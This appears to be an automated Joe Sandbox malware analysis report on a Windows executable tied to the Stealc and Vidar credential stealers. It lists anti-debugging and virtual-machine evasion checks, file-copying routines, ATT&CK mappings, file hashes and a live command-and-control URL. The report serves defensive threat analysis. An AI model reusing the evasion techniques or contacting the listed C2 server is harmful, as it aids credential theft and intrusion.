                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473BAC second address: 1473BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473BC4 second address: 1473BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F98450EE8CBh 0x00000008 jnc 00007F98450EE8C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473BDA second address: 1473BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147408B second address: 147408F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147408F second address: 1474098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1474243 second address: 147424B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147424B second address: 147426D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F9844BC1D56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F9844BC1D61h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B00C second address: 147B012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B012 second address: 147B020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F9844BC1D5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B3F4 second address: 147B3F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B3F9 second address: 147B3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B57C second address: 147B590 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F98450EE8C6h 0x00000008 jmp 00007F98450EE8CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B6D1 second address: 147B6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1261B0D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1400140 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 14286AF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1413F9F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12619F9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01014910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01014570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01013EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01001160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%
Source: file.exe, 00000000.00000002.1779494572.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1779494572.00000000018FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13275
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13278
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13329
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13295
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13289
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010045C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01017850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01017B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01016920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01017850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01017A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php# | 19% | Virustotal | | Browse
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37m | file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/$( | file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php# | file.exe, 00000000.00000002.1779494572.00000000018F2000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/:( | file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1522422
                      Start date and time:2024-09-30 02:00:09 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 54s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 81
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • Excluded IPs from analysis (whitelisted): 20.114.59.183, 93.184.221.240
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
Match: 185.215.113.37
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Amadey, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                      No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
file.exe | Get hash | malicious | Amadey, Stealc | Browse | 185.215.113.103
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.947385762179823
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'808'384 bytes
                      MD5:e3989af8cb5908ba300311259af23245
                      SHA1:0013081341d0faf8d7b9a9a20d75310d8b9c13fa
                      SHA256:665f8ded044e58e1900e7441cc75ebbc9438f9a6a0fde9528698dab670966203
                      SHA512:4af313373b2a17f9d877ec6761cd137ea030aa39f0a430911f6c44b88b6a7f98deebb065cc7859c4eb6a6e70aeb7b4a505ae034402eeed904a36b9ddc2fa490b
                      SSDEEP:24576:YVOgpgidgEO5ukRt5/EoQKdkPmmXRZOY5yuLRyu1dEvMznFh67fd8/GChwAc1:MKEWuIt5Monc7OFcDdEEjre8/Nn
                      TLSH:F5853332EB32A3F5DFB78C75DA6F9A80A464C3252B9D6B6C5180823CEC7B744857940D
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0xa89000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F9844E34B3Ah
                      pcmpeqd mm3, qword ptr [ebx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [edx+ecx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or al, 80h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or byte ptr [eax+00000000h], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax+00000000h], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [eax+00000000h], eax
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 4dd8360c3a41f9e101a9dc387a144950 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x296000 | 0x200 | 82b8d7deb73e702d92ced27a8c01aff1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
exwozbij | 0x4f4000 | 0x194000 | 0x193600 | 766bca38bd874d0c9f49d3b37f717f3a | False | 0.9950333610938953 | data | 7.953490732533179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
werwxfcu | 0x688000 | 0x1000 | 0x400 | 123bbdc990f2623919013aeb1bb2ba4b | False | 0.7587890625 | data | 5.990747173738001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x689000 | 0x3000 | 0x2200 | f11f8e563fb110ae7c0f67340c3e59a9 | False | 0.0627297794117647 | DOS executable (COM) | 0.8284828838499194 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
